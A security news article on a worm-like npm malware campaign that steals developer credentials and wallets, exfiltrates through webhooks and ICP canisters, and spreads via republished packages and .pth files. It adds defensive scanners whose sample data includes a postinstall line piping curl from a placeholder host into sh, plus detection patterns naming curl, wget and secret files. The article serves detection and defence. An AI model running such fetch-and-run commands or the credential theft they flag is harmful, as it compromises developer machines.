Canister-Backed npm Malware Campaign Expands, Targeting AI Developer Toolchains
A new wave of supply chain attacks is hitting the npm ecosystem, and this time the blast radius is moving deeper into AI developer workflows. Security researchers at Socket say the latest campaign shows strong overlap with a previously identified wormable attack dubbed CanisterWorm, suggesting either a shared operator or direct reuse of adversary tooling.
At the center of the incident are compromised packages tied to Namastex Labs, a company that promotes AI consulting and autonomous agent tooling through its Automagik suite. Malicious versions of packages such as @automagik/genie and pgserve were quietly republished with embedded malware that executes during installation, turning routine developer workflows into an entry point for credential theft and lateral supply chain compromise.
A Familiar Playbook, Now Aimed at AI Tooling
According to Socket’s analysis, the malware closely mirrors tactics seen in earlier TeamPCP-linked supply chain attacks. The payload executes automatically during installation, harvests secrets from the developer environment, and exfiltrates them to attacker-controlled infrastructure. It then attempts to propagate itself by abusing stolen publishing credentials.
What stands out is the infrastructure choice. Instead of relying solely on traditional command and control servers, the attackers again use Internet Computer Protocol (ICP) canisters as a dead-drop channel. This approach makes takedowns more difficult and signals a growing shift toward decentralized infrastructure in malware operations.
The overlap is not subtle. Researchers identified explicit references in the malicious code to previously observed TeamPCP techniques, including methods associated with LiteLLM-related attack chains.
Credential Theft at Developer Scale
The payload goes far beyond basic data collection. It systematically scans for high-value secrets across local environments, including configuration files, cloud credentials, SSH keys, and CI/CD tokens. It also digs into developer tooling artifacts such as Kubernetes configs, Terraform state, and local environment files.
This behavior is designed to maximize downstream impact. A single compromised developer machine can expose access to production systems, cloud environments, and internal package registries.
The malware also targets browser and crypto wallet data, attempting to extract credentials and local storage tied to wallets like MetaMask and Phantom, along with files associated with Bitcoin, Ethereum, and Solana ecosystems.
Exfiltration Meets Encryption
Once collected, the data is exfiltrated through two parallel channels. One uses a standard HTTPS webhook endpoint. The other sends data to an ICP canister endpoint, effectively decentralizing part of the attacker’s infrastructure.
If the payload ships with an RSA public key, the malware encrypts the stolen data with AES and RSA (a hybrid scheme, with the RSA key presumably protecting the AES key); if the key is missing, it falls back to sending the data in plaintext. The fallback means exfiltration still succeeds when part of the payload is broken, and it also means that network captures from those infections may hold the stolen secrets in the clear.
Worm-Like Propagation Across npm and PyPI
This is not just a credential stealer. It is a self-propagating system.
The malware attempts to extract npm tokens from infected machines, identify packages the victim can publish, inject malicious install hooks, and republish those packages. In parallel, it includes logic to spread into the Python ecosystem by writing .pth files into site-packages: the interpreter processes these files at startup, and any line beginning with `import` is executed as Python code, so the payload runs every time Python launches without the victim installing anything further.
That cross-ecosystem capability raises the stakes. It turns a single compromised environment into a launchpad for multi-language supply chain attacks spanning npm and PyPI.
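The .pth mechanism described above is easy to hunt for. The scanner below is an added example, not Socket's tooling or the Automagik project's code; it lists every .pth line the interpreter would execute and flags the loader-like ones. The loader-pattern list and the sample .pth content are constructed assumptions, not indicators from the campaign.

```python
"""Hunt for .pth files that execute code when Python starts.

Added example, not Socket's tooling. CPython's site module processes every
*.pth file in site-packages at start-up and exec()s any line that begins
with "import " or "import\t" (checked on the raw line, so an indented line
is treated as a path entry, not code). This lists those executed lines and
flags the ones that look like loaders.
"""
import re
import site
from pathlib import Path

# Assumption: a starting list of loader-like tokens; extend with your own.
LOADER_HINTS = re.compile(
    r"exec\(|eval\(|compile\(|base64|marshal|zlib|__import__|subprocess|"
    r"urllib|socket|\\x[0-9a-fA-F]{2}"
)


def analyze_pth_text(text):
    """Split one .pth file's content into (executed import lines, suspicious ones)."""
    import_lines, suspicious = [], []
    for raw in text.splitlines():
        line = raw.rstrip("\r\n")
        # Mirrors site.py: only these prefixes are executed; everything else
        # (paths, comments, blank lines) never runs.
        if not line.startswith(("import ", "import\t")):
            continue
        import_lines.append(line)
        if LOADER_HINTS.search(line) or len(line) > 200:
            suspicious.append(line)
    return import_lines, suspicious


def site_package_dirs():
    """site-packages directories of the running interpreter, user site included."""
    dirs = list(getattr(site, "getsitepackages", lambda: [])())
    user = site.getusersitepackages()
    if user:
        dirs.append(user)
    return dirs


def scan_pth_files(dirs=None):
    """Return {path: (import_lines, suspicious)} for every .pth under dirs."""
    results = {}
    for d in (dirs if dirs is not None else site_package_dirs()):
        for pth in Path(d).glob("*.pth"):
            try:
                results[str(pth)] = analyze_pth_text(pth.read_text(errors="replace"))
            except OSError:
                continue
    return results


# Constructed sample of what a dropped .pth might look like (not a real IOC;
# the base64 blob is just print('hi')).
SAMPLE_PTH = (
    "/opt/tools/lib\n"
    "import _virtualenv\n"
    "import base64, sys; exec(base64.b64decode('cHJpbnQoJ2hpJyk='))\n"
)

if __name__ == "__main__":
    executed, flagged = analyze_pth_text(SAMPLE_PTH)
    print("sample: executed lines:", len(executed), "flagged:", flagged)
    for path, (executed, flagged) in scan_pth_files().items():
        if executed:
            print(path, "->", len(executed), "executed line(s),", len(flagged), "flagged")
            for line in flagged:
                print("   FLAG:", line[:120])
```

Expect known-benign hits: virtualenv's `_virtualenv.pth` and setuptools' `distutils-precedence.pth` both use executed import lines (the latter calls `__import__`, so this scanner flags it). Review flagged entries against the package that installed them rather than deleting on sight.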
Signs of a Larger Compromise
Several indicators suggest this may not be a simple case of a rogue package upload.
The affected packages appear to belong to legitimate projects with real users and active development. Some versions published to npm do not align with corresponding GitHub tags, a mismatch often associated with compromised publishing pipelines.
Researchers also identified related malicious packages across multiple namespaces, including @fairwords and @openwebconcept, pointing to shared infrastructure or code reuse.
At the time of analysis, some compromised packages still showed active download volume, underscoring the risk to downstream developers.
Tradecraft Evolution in Software Supply Chain Attacks
The attack combines several advanced techniques into a single payload:
Install-time execution via postinstall hooks
Broad credential harvesting across developer environments
Dual-channel exfiltration using webhooks and decentralized infrastructure
Worm-like propagation through stolen publishing credentials
Cross-ecosystem targeting of npm and PyPI
This convergence signals a maturation of supply chain threats. Attackers are no longer just poisoning packages. They are building self-sustaining infection loops designed to scale across developer ecosystems.
What Security Teams Should Do Now
Defenders should assume compromise if any affected versions were installed.
Immediate actions include removing malicious package versions (pinning to known-good ones and clearing caches that may still hold the bad tarballs), rotating every exposed credential, including npm and PyPI publishing tokens, cloud keys, SSH keys and CI/CD secrets, and auditing package publishing activity for anomalies. Teams should also hunt for indicators such as unusual preinstall and postinstall scripts, known exfiltration endpoints, and mismatches between npm packages and source repositories. Because the payload runs during installation, `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) removes the execution vector, at the cost of breaking packages that legitimately need install hooks.
Comparing published artifacts against GitHub releases is becoming a critical control point. A version that exists on the registry with no matching tag, or a tarball whose contents differ from the tagged commit, may signal tampering in the release pipeline; where a package publishes provenance attestations, `npm audit signatures` verifies them against the registry.
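Two of the hunts above can be scripted. The first block is an added example (not Socket's tooling or the project's code) that walks a node_modules tree and reports every package with install-time scripts, scoring the script text, and any local .js file it launches, against loader-like patterns; the indicator list is an assumption, and the ICP gateway domains in it are the public boundary-node hosts canister traffic normally passes through, not indicators taken from this campaign.

```python
"""Hunt for npm packages that run code at install time.

Added example, not Socket's tooling. Reads every package.json under
node_modules, reports packages declaring preinstall/install/postinstall/
prepare scripts, and scores the hook text (plus any local .js it runs).
"""
import json
import re
from pathlib import Path

HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumption: a starting set of heuristics to extend with vendor IOCs.
INDICATORS = {
    r"\bnode\s+-e\b": "inline node eval",
    r"\b(curl|wget)\b": "network fetch from shell",
    r"base64": "base64 blob",
    r"\beval\s*\(": "eval",
    r"child_process": "spawns processes",
    r"https?://": "hard-coded URL",
    r"\.(ic0\.app|icp0\.io)\b": "ICP canister gateway host",
    r"\.npmrc|NPM_TOKEN": "touches npm credentials",
    r"\.ssh|\.aws|\.kube|\.terraform|\.env\b": "reads developer secrets",
}


def find_indicators(text):
    """Labels of every indicator pattern present in text."""
    return [label for pat, label in INDICATORS.items() if re.search(pat, text)]


def assess_manifest(manifest, pkg_dir=None):
    """Assess one parsed package.json; None if it declares no install hooks."""
    scripts = manifest.get("scripts") or {}
    hooks = {h: scripts[h] for h in HOOKS if h in scripts}
    if not hooks:
        return None
    corpus = "\n".join(hooks.values())
    # Hooks often just run "node install.js"; pull that file into the corpus.
    if pkg_dir is not None:
        for ref in re.findall(r"[\w./-]+\.[cm]?js\b", corpus):
            target = Path(pkg_dir) / ref
            if target.is_file():
                corpus += "\n" + target.read_text(errors="replace")
    return {
        "name": manifest.get("name", "?"),
        "version": manifest.get("version", "?"),
        "hooks": hooks,
        "indicators": find_indicators(corpus),
    }


def scan_node_modules(root):
    """All hook-bearing packages under root, most suspicious first."""
    findings = []
    for pj in Path(root).rglob("package.json"):
        if "node_modules" not in pj.parts:
            continue
        try:
            manifest = json.loads(pj.read_text(errors="replace"))
        except (ValueError, OSError):
            continue
        finding = assess_manifest(manifest, pj.parent)
        if finding:
            findings.append(finding)
    return sorted(findings, key=lambda f: len(f["indicators"]), reverse=True)


if __name__ == "__main__":
    import sys
    # Constructed manifest so the script demonstrates itself offline.
    sample = {"name": "@example/hypothetical", "version": "9.9.9",
              "scripts": {"postinstall": "node -e \"require('child_process')"
                          ".exec('curl https://example.invalid | sh')\""}}
    print("sample:", assess_manifest(sample))
    for f in scan_node_modules(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{f['name']}@{f['version']}: "
              f"{', '.join(f['indicators']) or 'no indicators'}")
        for hook, cmd in f["hooks"].items():
            print(f"    {hook}: {cmd}")
```

Run it against a project checkout (`python hook_hunt.py /path/to/project`); native-addon packages legitimately use install hooks, so treat the indicator count as triage order, not a verdict.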
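The second block, also an added example rather than Socket's method, performs the registry-versus-repository comparison: it maps git tags to the versions they name and reports versions that npm lists but no tag accounts for. The tag conventions it understands (v1.2.3, 1.2.3, name@1.2.3, name-v1.2.3) are assumptions about common release practice, and the sample data is constructed.

```python
"""Compare versions published to npm with tags in the package's git repo.

Added example, not Socket's method. Feeds on `npm view <pkg> versions --json`
and `git ls-remote --tags <repo>`; prints versions that exist on the registry
but have no matching tag.
"""
import json
import re
import subprocess
import sys

SEMVER_AT_END = re.compile(
    r"(\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?)$"
)


def tag_to_version(tag):
    """Map a tag or refs/tags/... line to the semver it names, or None."""
    if tag.startswith("refs/tags/"):
        tag = tag[len("refs/tags/"):]
    if tag.endswith("^{}"):           # peeled annotated tag from ls-remote
        tag = tag[:-3]
    m = SEMVER_AT_END.search(tag)
    if not m:
        return None
    # v1.2.3, pkg-v1.2.3 and @scope/pkg@1.2.3 all end in the version; reject
    # a match whose preceding character is part of a longer dotted number.
    if m.start() > 0 and tag[m.start() - 1] in "0123456789.":
        return None
    return m.group(1)


def untagged_versions(npm_versions, git_tags):
    """Registry versions, in registry order, that no tag accounts for."""
    tagged = {v for v in map(tag_to_version, git_tags) if v}
    return [v for v in npm_versions if v not in tagged]


def fetch_npm_versions(pkg):
    """Every version the registry lists (npm returns a bare string for one)."""
    out = subprocess.run(["npm", "view", pkg, "versions", "--json"],
                         check=True, capture_output=True, text=True).stdout
    versions = json.loads(out)
    return [versions] if isinstance(versions, str) else versions


def fetch_git_tags(repo_url):
    """Tag refs from `git ls-remote --tags`, e.g. refs/tags/v1.2.3."""
    out = subprocess.run(["git", "ls-remote", "--tags", repo_url],
                         check=True, capture_output=True, text=True).stdout
    return [line.split("\t", 1)[1] for line in out.splitlines() if "\t" in line]


# Constructed sample: three registry versions, tags for only the first two.
SAMPLE_NPM = ["1.0.0", "1.0.1", "1.0.2"]
SAMPLE_TAGS = ["refs/tags/v1.0.0", "refs/tags/v1.0.1", "refs/tags/v1.0.1^{}"]

if __name__ == "__main__":
    if len(sys.argv) == 3:
        pkg, repo = sys.argv[1:]
        npm_versions, tags = fetch_npm_versions(pkg), fetch_git_tags(repo)
    else:
        pkg, repo = "@example/hypothetical", "<sample data>"
        npm_versions, tags = SAMPLE_NPM, SAMPLE_TAGS
    for v in untagged_versions(npm_versions, tags):
        print(f"{pkg}@{v}: published to npm, no matching tag in {repo}")
```

A matching tag is necessary, not sufficient: an attacker holding repository credentials can push a tag, so for a suspect version also diff the unpacked tarball (`npm pack <pkg>@<version>`) against the tagged commit and look for files, install hooks or dependencies the repository does not have.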
The Bigger Picture
This campaign highlights a growing trend. As AI tooling and developer automation platforms gain adoption, they are becoming high-value targets for supply chain attackers.
By embedding malware into tools used for building and deploying AI systems, threat actors are positioning themselves upstream of entire software ecosystems.
The use of decentralized infrastructure like ICP further complicates detection and takedown efforts. Combined with worm-like propagation, it creates a blueprint for attacks that can persist and spread with minimal centralized control.
For security teams, the message is clear. The software supply chain is no longer just a risk surface. It is an active battlefield where attackers are iterating quickly and targeting the very tools developers trust the most.